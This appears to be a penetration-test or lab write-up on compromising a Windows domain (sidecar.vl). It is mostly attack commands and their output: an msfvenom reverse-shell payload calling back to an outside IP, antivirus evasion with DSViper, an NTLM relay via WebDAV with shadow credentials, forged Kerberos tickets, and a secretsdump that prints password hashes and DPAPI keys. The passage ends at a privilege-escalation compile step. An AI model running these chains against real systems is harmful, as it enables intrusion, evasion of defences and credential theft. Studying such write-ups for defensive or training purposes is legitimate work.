Discovering a share folder with excessive permission
During the enumeration the tester found that guest authentication was enabled into the server allows to enumerate the SMB shares. Additionally, it was discovered that Public share allows Read and Write permissions.
During the enumeration the tester attempted to obtain a reverse shell but the AV was enabled into the system preventing the execution or malicious software. The tester proceeded to bypass the detection using DSViper
Creating shellcode using msfvenom
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.5.48 LPORT=1234 -f raw > payload.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Using DSViper to create final payload
❯ ./DSViper
░▒▓███████▓▒░ ░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓███████▓▒░░▒▓████████▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░░▒▓██████▓▒░ ░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░
................................................
AntiVirus Bypass Tool (v.0.2.1)
---------------------------------------------------------
Created by Dhanush Gowda(dagowda) and Sumanth Vankineni
---------------------------------------------------------
................................................
You sure you want to Continue?(Use it ethically, and in lab enviroments only) y/n: y
Enter your payload choice:
1.)self-injection(XOR)
2.)self-injection(AES)
3.)Process Injection(spoolsv)(Can be used for lateral movement)
4.)Process Hollow
5.)Self Deleting Malware(HAVE TO WAIT, CLOSE TO A MINUTE FOR THE PAYLOAD TO EXECUTE)
6.)DLL side-load/rundll32 applocker bypass
7.)Process Injection(explorer.exe)
8.)Powershell(Will bypass with cloud detections enabled as well)(Make sure to run this payload twice)(use x64 payload only)
9.)Applocker bypass small shellcodes(Make sure to use x86 payloads)(Also make sure to change the .exe file name after everyrun on the same victim)(Make sure you run this payload twice)
10.)Applocker bypass Havoc/large shellcodes(use x86 payloads only)
11.)Indirect Syscall(Windows 10)(Possible EDR bypass loader)
>1
Please type in the shellcode file name: payload.bin
Selected self-injection(XOR)
[*]Payload successfully created as DSViper_xor.exe
Creating malicious Lnk files
The tester proceeded to create two malicious Lnk files:
During the post-enumeration the tester discovered an WebDAV that was subsequently enabled.
Starting WebClient service using net use command:
C:\Windows\System32> WS01
[x] Unable to reach DAV pipe on WS01, system is either unreachable or does not have WebClient service running
#Start the WebClient service (WebDAV)
C:\Windows\System32> net use x: http://10.8.5.48/
C:\Windows\System32> GetWebDAVStatus.exe WS01
[+] WebClient service is active on WS01
Starting WebClient service using c2tc-startwebclient .
sliver (COMBINED_AGLET) > c2tc-startwebclient
[*] Successfully executed c2tc-startwebclient (coff-loader)
[*] Got output:
[+] WebClient service started successfully.
NTLM Relay attack via WebDav + Shadows Credentials
To successfully carry out this attack, the environment must have the following misconfigurations:
LDAP Signing is NOT enforced
LDAPS Channel Binding is set to "NEVER"
MachineAccountQuota > 0 — if not, proceed with Shadow Credentials instead.
Valid NetBIOS name resolution via Responder
Intranet zone conditions has to be meet.
Which means add our Computer to the domain using the NetBIOS provided by Responder
*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Connection from 10.10.220.54 controlled, attacking target ldaps://DC01.sidecar.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Authenticating against ldaps://DC01.sidecar.vl as SIDECAR/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Connection from 10.10.220.54 controlled, attacking target ldaps://DC01.sidecar.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] Searching for the target account
[*] Target user found: CN=WS01,CN=Computers,DC=Sidecar,DC=vl
[*] Generating certificate
[*] HTTPD(80): Authenticating against ldaps://DC01.sidecar.vl as SIDECAR/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Certificate generated
[*] Generating KeyCredential
[*] Updating the msDS-KeyCredentialLink attribute of ws01$
[*] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Saved PFX (#PKCS12) certificate & key at path: jwtHNq1B.pfx
[*] Must be used with password: ogkkN1eOSsZYekxP3yoK
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
[*] Run the following command to obtain a TGT
[*] python3 PKINITtools/gettgtpkinit.py -cert-pfx jwtHNq1B.pfx -pfx-pass ogkkN1eOSsZYekxP3yoK Sidecar.vl/ws01$ jwtHNq1B.ccache
Requesting a Kerberos TGT Using Certificate-Based Authentication (PKINIT)
❯ python3 ~/Documents/Tools/PKINITtools/gettgtpkinit.py -cert-pfx jwtHNq1B.pfx -pfx-pass ogkkN1eOSsZYekxP3yoK 'Sidecar.vl/ws01$' jwtHNq1B.ccache
2025-05-02 16:52:42,718 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-05-02 16:52:42,730 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-05-02 16:52:58,213 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-05-02 16:52:58,213 minikerberos INFO 6063c92baf58fc52163b03a9437cc1126e92ab220743408bf7a733f213908ec9
INFO:minikerberos:6063c92baf58fc52163b03a9437cc1126e92ab220743408bf7a733f213908ec9
2025-05-02 16:52:58,215 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
Retrieving NT hash WS01$ computer account
❯ KRB5CCNAME='jwtHNq1B.ccache' python3 ~/Documents/Tools/PKINITtools/getnthash.py -k 6063c92baf58fc52163b03a9437cc1126e92ab220743408bf7a733f213908ec9 'Sidecar.vl/ws01$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
31fc45654028564d0ceda3817829d52f
Crafting Silver ticket for Local Administrator via S4U
#From Windows using rubeus.exe
Rubeus.exe asktgt /nowrap /user:"ws01$" /rc4:31fc45654028564d0ceda3817829d52f
Rubeus.exe s4u /self /nowrap /impersonateuser:Administrator /altservice:"host/ws01.sidecar.vl" /ticket:<ticket>
# From Linux
#Using PKINITtools
❯ python3 gets4uticket.py kerberos+ccache://sidecar.vl\\WS01\$:jwtHNq1B.ccache@DC01.sidecar.vl host/WS01.sidecar.vl@sidecar.vl Administrator@sidecar.vl Administrator.ccache -v
INFO:minikerberos:Trying to get SPN with Administrator@sidecar.vl for host/WS01.sidecar.vl@sidecar.vl
2024-02-16 01:41:58,209 minikerberos INFO Success!
INFO:minikerberos:Success!
2024-02-16 01:41:58,209 minikerberos INFO Done!
INFO:minikerberos:Done!
#Using impacket toolkit
❯ impacket-ticketer -domain-sid S-1-5-21-3976908837-939936849-1028625813 -nthash 31fc45654028564d0ceda3817829d52f -domain sidecar.vl -spn host/ws01.sidecar.vl -user-id 500 administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sidecar.vl/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
Dumping local SAM Hashes LSA Secrets on WS01
❯ KRB5CCNAME='administrator.ccache' impacket-secretsdump -k -no-pass WS01.sidecar.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1e7d0e7d432413f4ac3097f112b17322
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a7eb14088fd30c1af40ff91acd7734ce:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Admin:1000:aad3b435b51404eeaad3b435b51404ee:09e8df317667fc45698f7db80c58fd3f:::
Deployer:1001:aad3b435b51404eeaad3b435b51404ee:c5ad69fd899918450831c9d2b23f27a1:::
[*] Dumping cached domain logon information (domain/username:hash)
SIDECAR.VL/E.Klaymore:$DCC2$10240#E.Klaymore#66e0fb1767fe4f00983784904ad42579: (2025-05-02 21:01:00)
SIDECAR.VL/Administrator:$DCC2$10240#Administrator#0105946ef533599c2b1b769f3d9016dd: (2023-12-02 11:27:44)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
SIDECAR\WS01$:plain_password_hex:1880a0f624b99fb13150deef1afba09a3590e0e778518cb3cb48cdb23b1ab50c87bba5ce15d4b7c3d0decaad51e242b0d852f85f7672ae293c87d5412a1ea19751c0ad8b496ea343aeaf428b1b04a22e5066b7d2665da598e5dfafa827df1e5e916c1a65ea28acc6a9d9caf8bdf021760d6581f550cfe932dfe842eee145bd0ebcb64f0841825d0ed65c2a9c2a7c131b2a3e614070d89d480e7996a8cbfb28996f6c3df4155641ffda9caf6d014499cec3d7520de7418f977465a42be2cc1e73447d213ae782f119ff8b9d01c8517f1447ca6b5fa42349086ecdb67c949b7fa36fa05a3d6c38fa5440bf08c82db6db10
SIDECAR\WS01$:aad3b435b51404eeaad3b435b51404ee:31fc45654028564d0ceda3817829d52f:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x5f9303f91320d51860ac3a1313e79027a226ec34
dpapi_userkey:0x21fd9a9c71f6b32d717142ca71212c70c33bf4d3
[*] NL$KM
0000 48 35 C4 FE DA 3E 65 75 57 78 B9 E8 26 12 99 AD H5...>euWx..&...
0010 C3 C9 10 90 E7 7E 77 ED 91 66 BB 10 28 15 FF 24 .....~w..f..(..$
0020 6E 20 0C A9 6A A1 82 8D EA 3E FC B5 DB 18 F9 0B n ..j....>......
0030 3C 62 FD 18 AE 7C B4 C5 AA 06 E6 4E D9 1F 27 85 <b...|.....N..'.
NL$KM:4835c4feda3e65755778b9e8261299adc3c91090e77e77ed9166bb102815ff246e200ca96aa1828dea3efcb5db18f90b3c62fd18ae7cb4c5aa06e64ed91f2785
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
Obtaining a shell as Administrator
❯ KRB5CCNAME='administrator.ccache' impacket-wmiexec -k -no-pass WS01.sidecar.vl -shell-type powershell
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> C:\Temp\Loader.exe
Compromising domain controller
Initial Foothold on DC01
Discovering a valid user domain
During enumeration, the tester found the domain user svc_deploy, which appears similar to the local user Deployer found on WS01. This could indicate that they are the same user and may share the same credentials.
The user possesses SeTcbPrivilege ("") which means that can impersonation a token for any other user without knowing the credentials, add an arbitrary group (admins) to the token, set the integrity level of the token to "medium", and assign this token to the current thread (SetThreadToken).
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Abusing of SeTcbPrivilege via TcbElevation
#Compile: Open Developer Command prompt for VS
cl TcbElevation.cpp /D_UNICODE /DUNICODE /EHsc /link Secur32.lib Advapi32.lib
